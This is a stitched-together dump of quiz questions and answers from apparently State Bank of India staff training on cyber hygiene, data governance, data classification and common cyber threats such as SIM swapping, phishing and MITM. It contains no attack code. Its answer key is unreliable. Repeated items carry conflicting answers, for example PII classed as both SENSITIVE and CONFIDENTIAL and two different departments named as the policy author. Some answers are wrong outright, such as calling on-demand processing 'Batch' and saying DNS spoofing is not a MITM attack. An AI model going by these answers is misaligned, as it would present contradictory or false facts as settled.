You can use the multilingual image based virtual keyboard in Hindi or English only.
The multilingual image based virtual keyboard is available in 13 languages.
You can use the multilingual image based virtual keyboard in Hindi or Tamil only
The multilingual image based virtual keyboard is available in Hindi, Tamil, Oriya or Marathi only

11
Pick the odd one.
Passwords should be complex, sufficiently long and secret.
Passwords must be created using small & upper case, when own name or short form of own name and own initials are used.
Users are responsible for all activities originating from their user credentials.
Passwords should not be treated like signatures.

12
Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank.
Users should not install any software that is not authorized for the Bank’s business.
Users on whose PC / Server such software runs shall be solely responsible for Copyrights / IPR violation, Legal and Penal actions as per IT Act
Successful backup of critical applications or data should be ensured yearly and to be kept offsite.
All are true

13
Which of the following statements is not true about the Acceptable usage policy (IS Policy) of our Bank?
Employees, to whom State Bank owned laptops or any other Portable devices are issued, are responsible for their safe custody
Employees who are authorized to access emails and Bank’s data on mobile devices should ensure that MDM application software is installed on those mobile devices.
Employee’s mobile devices need not have Antivirus software
Loss of portable devices should be reported immediately to the local police and to the appropriate authority.

14
What action will you take when you are defrauded?
Change the username immediately
Lock the user access immediately
Send a written letter to the branch immediately
Write a letter to the RBI immediately

15
The company asked their employees to use their own devices and internet access while working from home. List some precautions that they could have exercised even under these conditions: (i) Ensuring that authorized antivirus is installed in the devices of the employees (ii) Ensuring that appropriate software patches are updated in the devices of the employees (iii) Asking the employees to use enterprise VPN
Options (i) and (ii) are sufficient
Option (i) alone is sufficient
Options (i), (ii) and (iii) are necessary
Option (ii) alone is sufficient

16
Which of the following options is NOT a best password security practice?
Enable two-factor authentication
Never completely trust service providers
Change your password, only if you suspect it may have been exposed
Never reuse a password

17
Which one of the following options is not considered an incident for reporting to RBI, NCIIPC and CERT-In?
Frauds/ Customer complaints related to frauds.
Accounting/clerical errors (incorrect ledger posting – cr/dr) that are rectified subsequently.
DoS/DDoS attack not lasting beyond 30 minutes contiguously or not impacting the customer service/digital channels even if it lasts beyond 30 minutes.
All of the above

18
Which of the following statements is correct regarding creation of Profile password using the Multilingual Image based Virtual keyboard?
The Profile password should be a combination of alphabets in two of the languages chosen
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special characters
The Profile password should be a combination of alphabets (in the language chosen), and numerals and images
The Profile password should be a combination of alphabets (in the language chosen) and numerals

19
Which one of the following applications is not a threat to compromise confidentiality of the data of portable devices?
Facebook
AirWatch agent
WhatsApp
Truecaller

20
What are the ways you can report an unauthorised transaction (ATM) without visiting the branch?
Call the dedicated number 1800 1111 09; a complaint can also be raised through https://crcf.sbi.co.in
Call the Branch
Call ATM Channel Manager OR ATM Channel Manager Facilitator linked to the ATM
Option a or c

21
Which of the following steps would not be a part of the planning for Work from home?
Ensuring the physical access to the systems room is restricted and monitored
Providing connectivity through a reputed service provider
Installing Anti-Virus in these systems
Arranging official laptops with proper configuration for the employees

22
Which of the following will not be considered as cyber incidents for reporting to RBI?
Incorrect accounting entries that are rectified subsequently
All the options will not be considered
Customer complaints related to frauds.
Physical tampering of ATMs

23
Select the correct statement in this case.
Ransomware Malware uses simple encryption codes to encrypt a victim’s files.
The patches could not stop the spreading malware
The motive for this Ransomware attack is always monetary
Ransomware Malware affects more devices in less time.

24
Which one of the following options is NOT a violation of acceptable usage policy?
The laptop was not protected by password
The laptop was kept open, and the desktop was not locked
There was a breach of critical and confidential data.
There was a data vulnerability due to lack of Anti-virus

25
What are the timelines for reporting cyber incidents to RBI and other Statutory Authorities
CERT-In & NCIIPC? Who should report the incident?
All cyber security incidents should be reported within 24 hours by Incident Response &
Management Team
All cyber security incidents should be reported within 12 hours by Incident Response &
Management Team
All cyber security incidents should be reported within 2 to 6 hours by Incident Response &
Management Team
All cyber security incidents should be reported within 24 to 48 hours by Incident Response
& Management Team

26
Which of the following options is an example of inappropriate use of the e-mail service?
Use of other officers' user ids or using a false identity.
Authorized exchange of proprietary information or confidential information
Use the accounts of others with their permission
Creation and exchange of e-mails information or content for official purpose.

27
Cyber security incidents can be reported
by any employee or public
by home branch only
by public
by any employee

28
Which method is NOT suggested to prevent new account fraud?
Ensure ATM Card connected to operational SB Account is blocked
Contact the bank immediately and ensure all the operating accounts are closed
Ensure to lock the internet banking user ID.
Applying the use of end-to-end encryption to protect online transactions.

29
What should be the minimum and maximum length of the login password in Retail Internet
Banking?
Minimum length should be 6 characters and maximum length 15 characters
Minimum length should be 8 characters and maximum length 20 characters
Minimum length should be 6 characters and maximum length 20 characters
Minimum length should be 8 characters and maximum length 15 characters

30
Select the wrong statement.
For online meetings, Manage screen sharing options. Change screen sharing to “Host
Only.” Avoid file sharing
Do not play online games on company devices as they may download trojans.
Secure your Wi-Fi router connections by enabling WPA2 + AES security
For web security, verify full URL by clicking the link, but do not give any
personal/confidential information
LESSON 1

Circle Data Governance Council (C-DGC) is headed by


CIRCLE CGM

Data Governance Policy is applicable to


All employees of the Bank

Master Data Management Process Includes ______


All of the Above

Which one of the following does NOT come under the People factor in Data Management practices?
Data Trainers

Which activities are considered under Data Management?


All of the above

Data Governance Policy is applicable to third parties having access to SBI network and Data.
As per Vendors agreement

Which among the following may be held accountable for quality of data?
People

Data Management with lack of easy access to information for important stakeholders may result in just _________
Data Governance Strategy

Apex level Data Governance Council (ADGC), is headed by


CHAIRMAN

The word “Data” shall collectively refer to the following descriptions:


All of the above

Inconsistent Data in Annual Income fields vis-à-vis customer profile may primarily result in ________
Incorrect AML/CFT compliance

____ is DGO of Circle


DGM & CFO

Poor Data Quality may result in ______


All of the Above

Capturing of incorrect / incomplete Data adversely affects:


Both 1 & 2

Prime objective of Data governance framework is to ensure-


All of the above

What is the frequency of the meeting for Apex level Data Governance Council (ADGC)?
Quarterly

Data processes must also put in place ______


All of the Above

Data Management Office reports to which of the DMDs
DMD & Chief Information Officer

Providing training to staff is one of the responsibilities of Data Privacy Officer


TRUE

Administrative office Data Governance Council (A-DGC), is headed by


DGM (B&O)

Data processes must Include ____________


All of the Above

Where does Data come from?


People, Process and Technology

Data processes must Include ____________


All of the Above

Data Governance Policy is formulated by which Department:


Data Management Office

Who would be held responsible for not feeding all the customer details in CBS, given by the customer in AOF?
Maker

Which of the below helps in monitoring Data Governance Activities?


Data Quality

Data Governance can NOT be achieved by Technology alone.


TRUE

What is the frequency of the meeting for Data Governance Council-Business Unit/ Vertical (DGC-BU/V)?
Monthly

Data Governance process includes activities as:


All of the above

Circle Data Governance Council (C-DGC) is headed by


CIRCLE CGM

Data Governance Policy is applicable to


All employees of the Bank

Master Data Management Process Includes ______


All of the Above

Which activities are considered under Data Management?


All of the above

Data Governance Policy is applicable to third parties having access to SBI network and
Data.
As per Vendors agreement

Data Protection officer reports to …..
CGM (R&DB Ops)
GM & Chief Data Management Officer

Which among the following may be held accountable for quality of data?
People

Data Management with lack of easy access to information for important stakeholders may
result in just _________
Data Governance Strategy

The word “Data” shall collectively refer to the following descriptions:


All of the above

Inconsistent Data in Annual Income fields vis-à-vis customer profile may primarily result in
________
Incorrect AML/CFT compliance

____ is DGO of Circle


DGM & CFO

Poor Data Quality may result in ______


All of the Above

Capturing of incorrect / incomplete Data adversely affects:


Both 1 & 2

Prime objective of Data governance framework is to ensure:
Compliance with relevant legislation, regulatory requirements, policies, procedures and standards.
All of the above

What is the frequency of the meeting for Apex level Data Governance Council (ADGC)?
Quarterly

Data processes must also put in place ______


All of the Above

Data Management Office reports to which of the DMDs


DMD & Chief Information Officer

Providing training to staff is one of the responsibilities of Data Privacy Officer


TRUE

Administrative office Data Governance Council (A-DGC), is headed by


DGM (B&O)

Data processes must Include ____________


All of the Above

Where does Data come from?


People, Process and Technology

Data processes must Include ____________


All of the Above

Data Governance Policy is formulated by which Department:
Data Management Office

Who would be held responsible for not feeding all the customer details in CBS, given by the
customer in AOF?
Maker

Which of the below helps in monitoring Data Governance Activities?


Data Quality

Data Governance can NOT be achieved by Technology alone.


TRUE

What is the frequency of the meeting for Data Governance Council-Business Unit/ Vertical
(DGC-BU/V)?
Monthly

Data Governance process includes activities as:


All of the above

Q: Data Governance Organisation involves a multi-tiered combination of business and
technology roles which include(s)
A: All of the above

Q: Data Governance Policy is applicable to all the domestic offices of SBI including:
A: All of the above

Q: What is the frequency of the meeting for Data Governance Council-Business Unit/
Vertical (DGC-BU/V)?
A: Monthly

Q: Data processes must also put in place ______


A: All of the Above

Q: At the time of account opening, it was found that Educational Qualification was not
mentioned by the customer in AOF, but it is a mandatory field in CBS
A: Teller should contact the customer and get the required details and then fill in CBS

Q: DBAs are NOT part of Data Stakeholders


A: FALSE

Q: Data Governance process includes activities as:


A: All of the above

Q: Data governance processes primarily must focus on __________


A: Business Needs

Q: Data Governance can NOT be achieved by Technology alone.


A: TRUE

Q: Data Governance Council-Business Unit/Vertical is being headed by


A: CGM

Q: Data processes must Include ____________
A: All of the Above

Q: Data Management Officer is accountable for all Data Governance related activities of
their respective department
A: FALSE

Q: Data Governance Policy is formulated by which Department:


A: Compliance Department

Q: Data processes must Include ____________


A: All of the Above

Q: Data processes must also put in place ______


A: All of the Above

Q: Data Governance Policy is applicable to third parties having access to SBI network
and Data
A: TRUE

Q: Administrative office Data Governance Council (A-DGC), is headed by


A: DGM (B&O)

Q: Where does Data come from?


A: People, Process and Technology

Q: Which among the following play major role in support of company-wide Data quality
initiatives?
A: People

Q: Data is always originated within the organization


A: FALSE

Q: (i) Data Governance is about the rules how to build the content.
(ii) Data Privacy is about the rules how to protect and use the content.
A: Only (ii) is correct

Q: Against availability of sizeable number of eligible customers only few confirmed leads
could be generated for an Analytics based product. What could be the underlying
reason?
A: Poor Data Quality

Q: Incorrect handling of data may result in exposing an organization to significant
liabilities.
A: TRUE

Q: Technology Solutions which help in data Governance initiatives include ____


A: All of the Above

Q: Which activities are considered under Data Management?


A: All of the above

Q: What are the main sources for low Data Quality?


A: Manual Data Entry

Q: While creating new CIF, customer has given marital status, but as it is not mandatory
in CBS:
A: As the customer has given the details in AOF, teller should fill the same in CBS

Q: DBAs are NOT part of Data Stakeholders


A: FALSE

Q: What is the frequency of the meeting for Data Governance Council-Business Unit/
Vertical (DGC-BU/V)?
A: Quarterly

Q: Technology Solutions which help in data Governance initiatives include ______


A: All of the Above

Q: Process for submission and handling of the Data request is mentioned in


A: Both

Q: _________________ is ultimately accountable with regard to the definition, Data quality
and value of Data in a given subject area.
A: Data Custodian

Q: Data processes must Include ____________


A: All of the Above

Q: Who among the following has a role to ensure that data governance initiatives are
aligned with business needs
A: Data Team

Q: Inconsistent Data in Annual Income fields vis-à-vis customer profile may primarily result
in ________
A: Incorrect AML/CFT compliance

Q: Where does Data come from?


A: People, Process and Technology

Q: Data Governance Policy is applicable to third parties having access to SBI network and
Data.
A: TRUE

Q: What is/are the responsibility(ies) of the Data Governance Council (DGC)


A: All of the above

Q: Against availability of sizeable number of eligible customers only few confirmed leads
could be generated for an Analytics based product. What could be the underlying reason?
A: Poor Data Quality

Q: Data Governance process includes activities as:


A: All of the above

Q: Data Governance Policy is applicable to


A: All employees of the Bank

Q: Prime objective of Data governance framework is to ensure:


A: All of the above

Q: Data Management Office reports to which of the DMDs
A: DMD & Chief Information Officer

Q: Data Governance can NOT be achieved by Technology alone.


A: TRUE

Q: As per the Bank's Data Governance structure, presently which is the Apex body for
Data Governance?
A: Apex level Data Governance Council (ADGC)

Q: Which of the following is/are a Key Data Quality Dimension?


A: All of the above

Q: The primary priority of Data Processes must be _____


A: MIS Needs

Q: ________ shall ensure that there is commensurate adherence, management and
periodic upkeep/review for Data in their respective custodies, as prescribed by Data
Governance Policy
A: Data custodians

Q: Which among the following play major role in support of company-wide Data quality
initiatives?
A: Regulators

Q: Data-driven business decisions are possible when _____ is involved in the Data
Governance.
A: Business Unit

Q: ____ is DGO of Circle


A: DGM & CRO

Q: Data governance processes primarily must focus on __________


A: Business Needs

Q: Data processes must Include ____________


A: Definitions of how data will be moved and changed

Q: Data processes must also put in place ______


A: All of the Above

Q: The word “Data” shall collectively refer to the following descriptions:


A: All of the above

Q: Analytics refers to the process of using Data in order to:


A: All of the above
LESSON 2
Which of the following is not a type of Data leak
Loss or theft of laptops and mobile devices

Non-sensitive Information includes:


Both 1 & 2

Capturing of incorrect interest rate in loan accounts may result in _____________.


All of the above

In ________________ Processing, small group of transactions are processed on demand


Batch

Which one is NOT an approved way of sharing granular Data/access Data under normal circumstances:
E-mail

Project Ganga Dashboard include divergences related to:


Both DQ & KRI

What are the different categories of Data Classification


SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC

Data quality is necessary to fulfil the needs of an organization in terms of


All of the above

Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
All of the above

Business Leads from Analytics comes under Customer Sensitive Granular Data
TRUE

Some of the key Data Privacy initiatives include:


All of the above

In an Account Opening Form, if Data has been provided by the customer in a non-mandatory field
(like mobile number / email ID), what should be done while inputting in CBS?
Input the Data exactly as given by the customer

Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________.
Both 1 & 2

Which Portal to be accessed for Data Loss Prevention (DLP) incidents


Data Infringement Portal

“Customer PII Data” is classified as ____________ Data


SENSITIVE

A staff can be held accountable for Data quality errors.


TRUE

What does GDPR stand for-


General Data Protection Regulation

Which of the following is true:
All of the above

A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the
age of customer is less than 18
DOB on OVD and AOF, if same, then only account may be opened

If a car dealer asks us for a list of customers having existing car loans, to market loans for new cars for us,
shall we share the list?
Cannot be shared

Incorrect classification of values like Gender or Customer Type comes under which one of the following Data
Quality Dimension?
Validity

“Internal audit reports” is classified as ____________ Data


CONFIDENTIAL

“SBI telephone directory” is classified as ____________ Data


PUBLIC

Capturing of incorrect CRA rating / ECR in a loan account may result in ______.
Both 1 & 2

The best principles for improving Data Quality include(s)


Both 1 & 2 above

What are the impacts of feeding incorrect date of birth of a customer in CBS
Incorrect Customer profile

Sharing of Data with external agencies is governed by


SOP on Data Sharing with External agencies/third parties

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data Sharing and Access – Within Bank’s Environment’:
Restricted & Registered access

In case of demand for customer Data by Regulatory Authority, it is to be shared as per DG Policy
TRUE

Salient features of Project Ganga include:


All of the above

Which of the following is not a type of Data leak


Loss or theft of laptops and mobile devices

Non-sensitive Information includes:


Both 1 & 2

Capturing of incorrect interest rate in loan accounts may result in _____________.


All of the above

In _______ Processing, small group of transactions are processed on demand
Batch

Which one is NOT an approved way of sharing granular Data/access Data under normal
circumstances:
E-mail

Project Ganga Dashboard include divergences related to:


Both DQ & KRI

Data quality is necessary to fulfil the needs of an organization in terms of


All of the above

Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
All of the above

Business Leads from Analytics comes under Customer Sensitive Granular Data
TRUE
FALSE

Some of the key Data Privacy initiatives include:


All of the above

In an Account Opening Form, if Data has been provided by customer in non mandatory
field ( like mobile number /email ID ), what should be done while inputting in CBS?
Input the Data exactly as given by the customer

Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________.
Both 1 & 2

Which Portal to be accessed for Data Loss Prevention (DLP) incidents


Data Infringement Portal

“Customer PII Data” is classified as ____________ Data


SENSITIVE

A staff can be held accountable for Data quality errors.


TRUE

What does GDPR stand for?


General Data Protection Regulation

Which of the following is true:


All of the above

A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was
found that the age of customer is less than 18
DOB on OVD and AOF, if same, then only account may be opened

Incorrect classification of values like Gender or Customer Type comes under which one of
the following Data Quality Dimension?
Validity

“Internal audit reports” is classified as ____________ Data
CONFIDENTIAL

“SBI telephone directory” is classified as ____________ Data


PUBLIC

Capturing of incorrect CRA rating / ECR in a loan account may result in ______.
Both 1 & 2

The best principles for improving Data Quality include(s)


Both 1 & 2 above

What are the impacts of feeding incorrect date of birth of a customer in CBS
Incorrect Customer profile

Sharing of Data with external agencies is governed by


SOP on Data Sharing with External agencies/third parties

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data
Sharing and Access – Within Bank’s Environment’:
Restricted & Registered access

In case of demand for customer Data by Regulatory Authority, it is to be shared as per DG
Policy
TRUE

Salient features of Project Ganga include:


All of the above

Q: Which of the following is true:


A: Data Privacy is about the rules how to protect and use the contents

Q: An SBI Card employee sitting in a branch asks for a list of high value customers
along with Mobile numbers for telecalling to sell SBI cards for the Branch. Branch
may share the list with the SBI Card employee.
A: FALSE

Q: What is needed to create Data Quality Index?


A: Data quality rule and profiling results.

Q: Capturing of incorrect security in secured loan accounts may result in


A: Both 1 & 2

Q: While verifying the pop-up name of PAN holder in CIF creation screen
A: 1 & 3

Q: As per Data Protection Bill (Draft) PII stands for


A: Personally Identifiable Information

Q: To boost the housing loan business of the branch , list of HNIs can be shared with
HLCs through:
A: Not to be shared

Q: India is coming with its own Bill on Data Protection which is called ___
A: Personal Data Protection Bill

Q: Project Ganga Dashboard include divergences related to:


A: Both DQ & KRI

Q: Branch has sanctioned a Car loan to one of its staff, but the loan instalment was
not fed in HRMS. The staff paid the instalment through his account and informed the
BM that a SI has been registered for the same.
A: Recovery of staff loan should be through HRMS only, so recovery details in
HRMS need to be updated

Q: What are the impacts of feeding incorrect date of birth of a customer in CBS
A: 1 & 2

Q: DQI Index has been included as one of the Key Responsibility Areas (KRAs) in
Career Development System (CDS)
A: TRUE

Q: Data quality is necessary to fulfil the needs of an organization in terms of


A: All of the above

Q: As per the Bank’s approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is to be considered as “Third Party”
A: All the above are to be treated as Third Parties

Q: Data Quality Index (DQI) dashboard measures the Data Quality for:
A: CIFs & Loans

Q: Updated policies or SOPs on Data Governance can be accessed through?


A: SBI Times >> MIS Online >> SOPs >> DMO

Q: For personal communication, we can use our official email IDs


A: FALSE

Q: Restricted access to Data means:


A: Both 1 & 2

Q: While inputting temporary address of a customer in CBS, it should be taken care
that
A: "From & To" date in the temporary screen needs to be filled in as declared by the
customer

Q: Some of the key Data Privacy initiatives include:


A: All of the above

Q: In the Data Infringement portal, unattended infringements on Data Loss
Prevention (DLP) may result in_____
A: Penal Score (1 to 4 marks) in RFIA of the Branch

Q: A staff can be held accountable for Data quality errors.


A: TRUE

Q: As per the Bank’s approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is NOT to be considered as “Third Party”
A: Internal Auditors

Q: Customer sensitive Granular Data can be copied and stored without any approval
A: FALSE

Q: What are the two important pillars of the SOP on ‘Customer Sensitive Granular
Data Sharing and Access – Within Bank’s Environment’:
A: Regulated & Limited access

Q: What are the different categories of Data Classification


A: SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC

Q: “Customer PII Data” is classified as ____________ Data


A: CONFIDENTIAL

Q: Impact of poor Data Quality on a Branch include ____


A: Both 1 & 2 above

Q: Which of the following is not one of the functions of an effective Data Loss
Prevention (DLP) program
A: Follow-up with Data users for Data Quality enhancement

Q: In an Account Opening Form, if Data has been provided by the customer in a non-mandatory
field (like mobile number / email ID), what should be done while inputting
in CBS?
A: Input the Data exactly as given by the customer

Q: Sharing of customer sensitive granular Data is governed by which Policy :


A: Data Governance Policy

Q: Scope of Customer Sensitive Granular Data Sharing & Access Framework
covers:
A: All of the above

Q: For official purpose, if we are required to share customer sensitive data, then we
should:
A: Delete the data after use

Q: Which one is NOT an approved way of sharing granular Data/access Data under
normal circumstances:
A: E-mail

Q: Salient features of Project Ganga include:


A: Customer One view

Q: What are the impacts of not verifying the pop-up name of PAN holder, while
fetching PAN details
A: 1 & 2

Q: Incorrect spelling of Customer name comes under which one of the following Data
Quality Dimension?
A: Accuracy

Q: What is needed to create Data Quality Index?
A: Data quality rule and profiling results.

Q: Restricted access to Data means:


A: Both 1 & 2

Q: Some of the key Data Privacy initiatives include:


A: All of the above

Q: What are the impacts of feeding incorrect date of birth of a customer in CBS
A: 1 & 2

Q: Can we store customer data on our Desktop ?


A: NO

Q: Objectives of Data Quality are:
i. Accuracy, validity
ii. Timeliness, completeness
iii. Uniqueness, consistency
A: All of the above

Q: A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18
A: DOB on OVD and AOF, if same, then only account may be opened

Q: Capturing of incorrect CRA rating / ECR in a loan account may result in _____
A: Both 1 & 2

Q: Error categories in DQI for CIF related errors are:
A. Risk categorization
B. Personal Profile
C. PAN Related
D. Gender Related
E. Age Related
A: All of the Above

Q: Capturing of incorrect interest rate in loan accounts may result in ____________


A: All of the above

Q: Non capturing of PAN in CIF, even if furnished in the AOF, may result in ___
A: Both 1 & 2

Q: If a car dealer asks us for a list of customers having existing car loans, to market
loans for new cars for us, shall we share the list?
A: Cannot be shared

Q: While inputting temporary address of a customer in CBS, it should be taken care
that
A: "From & To" date in the temporary screen needs to be filled in as declared by the
customer

Q: For personal communication, we can use our official email IDs


A: FALSE

Q: While verifying the pop-up name of PAN holder in CIF creation screen
A: 1 & 3

Q: The access to Customer Sensitive Granular Data to the users should be made
strictly on the basis of:
A: Both 1 & 2

Q: Which of the following is not a type of Data leak


A: Improper categorization of sensitive Data

Q: As per the Bank’s approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is to be considered as “Third Party”
A: All the above are to be treated as Third Parties

Q: “SBI telephone directory” is classified as ____________ Data


A: INTERNAL

Q: What are the possible means by which Customer Sensitive Granular Data can get
divulged or leaked to any unrelated person / third party like vendors, dealers etc:
A: All of the above
LESSON 3
What is a Denial of Service Attack?
It is an attack meant to shut down a machine or network, making it inaccessible to its intended users.

Which one of the following is a precaution to be taken while operating the ATM?
Check if any extra suspicious device is attached to the ATM machine.

Which of the following is not a stage in SIM swapping?


All the options above are stages of SIM Swapping

Select the correct statement about the impact of Cyber Risks.


All are true

__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?


Scareware

Which of the following principles of the first of the CIA Triad, Confidentiality, is/are correct?
a. Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects,
or resources.
b. The goal of confidentiality protection is to prevent unauthorized access to the information.
c. Confidentiality focuses security measures on ensuring that none other than the sender of a message is able to read it.
d. Secure encryption of the information ensures Confidentiality.
a, b and d

What is not true about SIM Swapping?


Fraudsters get access to the root of the mobile phone through SIM Swapping

With the enhanced sharing of information over a global network for almost all life functions, which one of the
following has become the latest addition to the essential objectives of Information Security after the CIA Triad?
Non-repudiation

What is not true about myths associated with Cyber Risk?


IT team is alone not responsible for Cyber Security

How does the use of Virtual keyboard protect the customer?


It protects against Keylogger malware

Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what
was considered then as a significant action on the Dark web market?
Silk Road 2.0

The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit,
Account suspension, winning lottery, SIM block, eKYC updates etc. is known as________.
Spoofing

The technique used to send the emails to all the employees of the Bank is known as ____________.
Spear Phishing

Cyber-attacks that originate through a third-party vendor are also called ________?
Supply chain attacks

What makes the SolarWinds attack an unusual hack?
Through one piece of malicious code in the SolarWinds vendor’s application, the hackers gained access to
Orion software

Your friend fears that he has shared the user credentials of OnlineSBI with a stranger.
It is a Sunday and Bank is closed. What immediate steps would you NOT advise him?
Change the password

Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential.
What is the new security feature in OnlineSBI?
OTP has been made mandatory at the time of login

Which one of the following is NOT a type of MITM attack?


Logic Bomb

Which of the following principles of the second of the CIA Triad, Integrity, is/are correct?
a. Integrity is the concept of protecting the accuracy and completeness of information and processing methods.
b. Integrity protection prevents any kind of alteration of the information.
c. Properly implemented integrity protection provides a means for authorized changes while protecting against
intended and malicious unauthorized activities (such as viruses and intrusions) as well as mistakes made by
authorized users (by commission or omission).
d. Use of a secure Hashing algorithm for the information ensures Integrity.
a, c and d

Which of the following browsers allows access to the Network which is popular for implementing encrypted
routing technology and preventing user tracking?
Tor

The fraudster gets the personal details of the people through _______technique.
Social engineering

Which of the following is not an example of data?


All are examples of data

Which one is not an option for disabling UPI services?


YONO Main Screen UPI Enable/Disable UPI

Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment.
He is redirected to a site of SBI. Before he logs in, what should the website address on the screen be?
It should start with https://www.onlinesbi.com

If you want to change the username and password for your SBI Internet banking,
which of the following statements is correct?
You cannot change the Username, but you can change the password at any time

Which one of the following statements is false?


Bulk SMS is sending SMS from mobile to many people.

A Cyber-Attack
option a & b

_____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection.
Once such a connection is established then the attacker will be able to steal photos, messages and contacts etc.
Bluesnarfing

Which one of the following statements is FALSE about APT attacks?
APT attacks may be identified immediately as they shut down the whole system

SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
Online Virtual Keyboard

What is a Denial of Service Attack?
It is an attack meant to shut down a machine or network, making it inaccessible to its
intended users

Which one of the following is a precaution to be taken while operating the ATM?
Check if any extra suspicious device is attached to the ATM machine.

Which of the following is not a stage in SIM swapping?


All the options above are stages of SIM Swapping

Select the correct statement about the impact of Cyber Risks.


All are true

__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?


Scareware

Which of the following principles of the first of the CIA Triad, Confidentiality, is/are correct?
a. Confidentiality is the concept of the measures used to ensure the protection of the
secrecy of data, objects, or resources.
b. The goal of confidentiality protection is to prevent unauthorized access to the
information.
c. Confidentiality focuses security measures on ensuring that none other than the sender of
a message is able to read it.
d. Secure encryption of the information ensures Confidentiality.
a, b and d

What is not true about SIM Swapping?


Fraudsters get access to the root of the mobile phone through SIM Swapping

With the enhanced sharing of information over a global network for almost all life
functions, which one of the following has become the latest addition to the essential
objectives of Information Security after the CIA Triad?
Non-repudiation

What is not true about myths associated with Cyber Risk?
IT team is alone not responsible for Cyber Security

How does the use of Virtual keyboard protect the customer?
It protects against Keylogger malware

Which one of the following is the leading illicit dark web marketplace which was taken
down by the FBI in what was considered then as a significant action on the Dark web
market?
Silk Road 2.0
The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit, Account suspension, winning lottery, SIM block, eKYC updates etc. is known as ________.
Spoofing

The technique used to send the emails to all the employees of the Bank is known as
____________.
Spear Phishing

Cyber-attacks that originate through a third-party vendor are also called ________.
Supply chain attacks
Vendor attacks

What makes SolarWinds attack an unusual hack?
The hackers through one malicious code in the application of SolarWinds vendor’s application gained access to Orion software

Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is
a Sunday and Bank is closed. What immediate steps would you NOT advise him?
Change the password

Even if a user compromises his/her login credentials of OnlineSBI, no one can login using
this credential. What is the new security feature in OnlineSBI?
OTP has been made mandatory at the time of login

Which one of the following is NOT a type of MITM attack?
Logic Bomb

Which of the following principles of the second of CIA Triad Integrity is/are Correct?
a. Integrity is the concept of protecting the accuracy and completeness of information and processing methods.
b. Integrity protection prevents any kind of alteration of the information.
c. Properly implemented integrity protection provides a means for authorized changes while protecting against intended and malicious unauthorized activities (such as viruses and intrusions) as well as mistakes made by authorized users (by commission or omission).
d. Use of a secure Hashing algorithm for the information ensures Integrity.
a, c and d

Which of the following browsers allows access to the Network which is popular for
implementing encrypted routing technology and preventing user tracking?
Tor

The fraudster gets the personal details of the people through _______ technique.
Social engineering

Which of the following is not an example of data?
All are examples of data

Which one is not an option for disabling UPI services?
YONO Main Screen UPI Enable/Disable UPI

Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. He is redirected to a site of SBI. Before he logs in, what should be the website address on the screen?
It should start with https://www.onlinesbi.com

If you want to change the username and password for your SBI Internet banking, which of
the following statements is correct?
You cannot change the Username but he/she can change the password at any time

Which one of the following statements is false?
Bulk SMS is sending SMS from mobile to many people.

A Cyber-Attack

Q: Which one of the following risks is not considered while evaluating a third party
vendor for risk assessment?
A: Market Risk

Q: _____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a connection is established then the attacker will be able to steal photos, messages and contacts etc.
A: Bluesnarfing

Q: Which one of the following statements is false?
A: Bulk SMS is sending SMS from mobile to many people.

Q: Non-repudiation is carried out through the services of authentication, authorization, confidentiality, and integrity. Confidentiality ensures which one of the following?
A: Secure encryption of the information

Q: Which one of the following best describes a Man in the Middle (MITM) attack?
A: An attack used to monitor and potentially modify communications between two users

Q: Which of the following principles of the first of the CIA Triad Confidentiality is/are
Correct?
A: a, c and d
Q: Which of the following attacks is not categorised under Exploit based attacks?
A: Email hijacking

Q: Which of the following is not a stage in SIM swapping?
A: All the options above are stages of SIM Swapping

Q: What is the full form of MITB Attack?
A: Man in the Browser

Q: If you click on the padlock sign in the Address bar. Which of the following information
will be available to you?
A: You will get information on who owns the site and who has verified the site

Q: What is a “Collect Request” in a UPI transaction?
A: It is a feature available in BHIM SBI Pay

Q: Which one of the following is NOT a type of MITM attack?
A: DNS Spoofing

Q: Which one of the following statements is more appropriate in terms of Vendor risk
assessment?
A: Continuous assessment of Vendor security practices needs to be done throughout the Contract life cycle.

Q: Cyber-attacks that originate through a third-party vendor are also called ________.
A: Supply chain attacks

Q: How does the use of Virtual keyboard protect the customer?
A: It protects against Keylogger malware

Q: Which one of the following statements is FALSE about APT attacks?
A: APT attacks may be identified immediately as it shuts down the whole system

Q: _______ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?
A: Scareware

Q: Which of the following may not be the signs that the Mobile Phone (Android/iOS) is
hacked?
A: All statements are signs that the Mobile phone is hacked

Q: What makes SolarWinds attack an unusual hack?
A: The hackers through one malicious code in SolarWinds Orion software gained access to thousands of other companies.

Q: Even if a user compromises his/her login credentials of OnlineSBI, no one can login
using this credential. What is the new security feature in OnlineSBI?
A: OTP has been made mandatory at the time of login

Q: Which of the following options is not a way to protect yourself from keyloggers?
A: Antivirus companies keep their records of the most common malware keyloggers and will flag them as dangerous.

Q: Social Engineering Attacks do not include _____________
A: Denial of Service attack

Q: What is not true about myths associated with Cyber Risk?
A: Compliance and security are the same

Q: Which of the following best describes the Supply chain attack?
